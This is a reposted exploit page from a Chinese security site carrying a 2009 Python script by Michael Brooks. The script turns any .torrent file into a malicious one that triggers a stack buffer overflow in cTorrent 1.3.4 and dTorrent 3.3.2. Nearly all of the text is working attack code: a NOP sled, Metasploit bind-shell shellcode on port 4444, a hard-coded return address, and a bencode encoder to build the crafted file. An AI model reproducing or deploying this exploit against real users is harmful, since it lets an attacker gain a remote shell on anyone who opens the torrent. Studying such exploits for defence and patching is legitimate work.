首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
cTorrent/DTorrent (.Torrent File) Buffer Overflow Exploit
来源:www.vfcocus.net 作者:Brooks 发布时间:2009-04-20  

#!/usr/bin/python

#Written By Michael Brooks
#04/17/2009

#Stack Based Buffer Overflow
#The vulnerability is in the btFiles::BuildFromMI function
#inside the btfiles.cpp file

#Exploit tested on cTorrent 1.3.4 using Debian Sarge using Linux kernel 2.4.27-3-386
#Can't get the exploit working on a modern linux kernel because of ASLR

#code is using python 2.5

#Home page for cTorrent 1.3.4:
#http://sourceforge.net/projects/ctorrent/  161,000+ Downloads
#dTorrent 3.3.2 is also vulnerable:
#http://sourceforge.net/projects/dtorrent/ 18,000+ downloads

import sys
import os
#This code will take any torrent file and turn it into an exploit.
USAGE="python exploit.py in_file.torrent out_file.torrent"

def main():
    #Start of the program
    bfile=fileio()
    try:
        bad_torrent=bfile.read_bencode(sys.argv[1])
    except:
        print USAGE
        sys.exit()
   
    exploit_str=create_exploit()
    print("Writing Bytes:"+str(len(exploit_str)))
    bad_torrent["info"]["files"][0]["path"][0]=exploit_str
    try:
        bfile.write_bencode(sys.argv[2], bad_torrent)
    except:
        print USAGE
        sys.exit()

def create_exploit():
    # linux_ia32_bind -  LPORT=4444 Size=108 Encoder=PexFnstenvSub http://metasploit.com
    shellcode  = "\x2b\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x27"
    shellcode += "\x1a\xbe\x4e\x83\xeb\xfc\xe2\xf4\x16\xc1\xed\x0d\x74\x70\xbc\x24"
    shellcode += "\x41\x42\x27\xc7\xc6\xd7\x3e\xd8\x64\x48\xd8\x26\x36\x46\xd8\x1d"
    shellcode += "\xae\xfb\xd4\x28\x7f\x4a\xef\x18\xae\xfb\x73\xce\x97\x7c\x6f\xad"
    shellcode += "\xea\x9a\xec\x1c\x71\x59\x37\xaf\x97\x7c\x73\xce\xb4\x70\xbc\x17"
    shellcode += "\x97\x25\x73\xce\x6e\x63\x47\xfe\x2c\x48\xd6\x61\x08\x69\xd6\x26"
    shellcode += "\x08\x78\xd7\x20\xae\xf9\xec\x1d\xae\xfb\x73\xce"
   
    #The exact address of our buffer is 0xbffffccc, which ebx tells us
    #however memeory changes before we control the eip, 
    #so we change the addr to hit the NOP sled
    eip="\x11\xf1\xff\xbf"
    #eip="\xcc\xfc\xff\xbf"#the add ebx is holding
   
    #this is a dummy address to satisfy other pointer before we return
    #this cannot be the EIP becuase this location is written to!
    dumb_addr="\xcc\xfc\xff\xbf"
   
    #nop sled
    long_str="\x90"*(4028-len(shellcode))
    #memory around the shellcode is written to,  but this is a safe place
    long_str+=shellcode
    #this 100byte buffer is written to before we control the eip
    long_str+="\x90"*100
    long_str+=eip#4128 bytes is the EIP!
   
    #This pointer must be real becuase it is written to in btFiles::BuildFromMI
    long_str+=dumb_addr#"this"
    #We can control these addresses but we don't need them
    #long_str+=dumb_addr#"metabuf"
    #long_str+=dumb_addr#"saveas"
    return long_str
       
#Start of functions for bencoding:
def BTFailure(msg):
    pass

def decode_int(x, f):
    f += 1
    newf = x.index('e', f)
    n = int(x[f:newf])
    if x[f] == '-':
        if x[f + 1] == '0':
            raise ValueError
    elif x[f] == '0' and newf != f+1:
        raise ValueError
    return (n, newf+1)

def decode_string(x, f):
    colon = x.index(':', f)
    n = int(x[f:colon])
    if x[f] == '0' and colon != f+1:
        raise ValueError
    colon += 1
    return (x[colon:colon+n], colon+n)

def decode_list(x, f):
    r, f = [], f+1
    while x[f] != 'e':
        v, f = decode_func[x[f]](x, f)
        r.append(v)
    return (r, f + 1)

def decode_dict(x, f):
    r, f = {}, f+1
    while x[f] != 'e':
        k, f = decode_string(x, f)
        r[k], f = decode_func[x[f]](x, f)
    return (r, f + 1)

decode_func = {}
decode_func['l'] = decode_list
decode_func['d'] = decode_dict
decode_func['i'] = decode_int
decode_func['0'] = decode_string
decode_func['1'] = decode_string
decode_func['2'] = decode_string
decode_func['3'] = decode_string
decode_func['4'] = decode_string
decode_func['5'] = decode_string
decode_func['6'] = decode_string
decode_func['7'] = decode_string
decode_func['8'] = decode_string
decode_func['9'] = decode_string

def bdecode(x):
    try:
        r, l = decode_func[x[0]](x, 0)
    except (IndexError, KeyError, ValueError):
        raise BTFailure("not a valid bencoded string")
    if l != len(x):
        raise BTFailure("invalid bencoded value (data after valid prefix)")
    return r

from types import StringType, IntType, LongType, DictType, ListType, TupleType


class Bencached(object):

    __slots__ = ['bencoded']

    def __init__(self, s):
        self.bencoded = s

def encode_bencached(x,r):
    r.append(x.bencoded)

def encode_int(x, r):
    r.extend(('i', str(x), 'e'))

def encode_bool(x, r):
    if x:
        encode_int(1, r)
    else:
        encode_int(0, r)
       
def encode_string(x, r):
    r.extend((str(len(x)), ':', x))

def encode_list(x, r):
    r.append('l')
    for i in x:
        encode_func[type(i)](i, r)
    r.append('e')

def encode_dict(x,r):
    r.append('d')
    ilist = x.items()
    ilist.sort()
    for k, v in ilist:
        r.extend((str(len(k)), ':', k))
        encode_func[type(v)](v, r)
    r.append('e')

encode_func = {}
encode_func[Bencached] = encode_bencached
encode_func[IntType] = encode_int
encode_func[LongType] = encode_int
encode_func[StringType] = encode_string
encode_func[ListType] = encode_list
encode_func[TupleType] = encode_list
encode_func[DictType] = encode_dict

try:
    from types import BooleanType
    encode_func[BooleanType] = encode_bool
except ImportError:
    pass

def bencode(x):
    r = []
    encode_func[type(x)](x, r)
    return ''.join(r)

class fileio:
    def read_bencode(self,file):
        infile = open(file,"r")
        file=infile.read()
        infile.close
        return bdecode(file)
   
    #writes a dictionary to a bencoded file
    def write_bencode(self,file,dict):
        outfile = open(file, 'wb')
        outfile.write(bencode(dict))
        outfile.close()   
   
#execute main
main()


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·XRDP <= 0.4.1 Remote Buffer Ov
·ClanTiger <= 1.1.1 (slug) Blin
·DNS Tools PHP Digger remote co
·Linux Kernel 2.6 UDEV Local Pr
·Microsoft GDI Plugin .png Infi
·Microsoft Media Player (quartz
·MS Internet Explorer EMBED Mem
·The Miniweb webserver suffers
·1by1 1.67 (.m3u File) Local St
·Apache Geronimo Application Se
·Groovy Media Player 1.1.0 (.m3
·MagicISO CCD/Cue Local Heap Ov
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved